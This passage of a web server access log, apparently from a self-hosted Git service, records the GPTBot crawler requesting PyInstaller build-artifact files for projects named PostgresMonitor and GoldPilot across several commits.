"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14115] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:14:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14294] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16630] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:14:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13914] [Gzip 8.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599806] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14995] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14265] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15357] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599818] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23482] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:14:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14084] [Gzip 6.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:14:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20130] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10416] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:14:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16633] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:14:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23063] [Gzip 19.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:14:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14232] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20143] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20146] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6288] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14135] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:14:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14296] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 9887] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:14:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14102] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:14:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:14:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10212] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10213] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599824] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23486] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:51 +0000] - 200 200 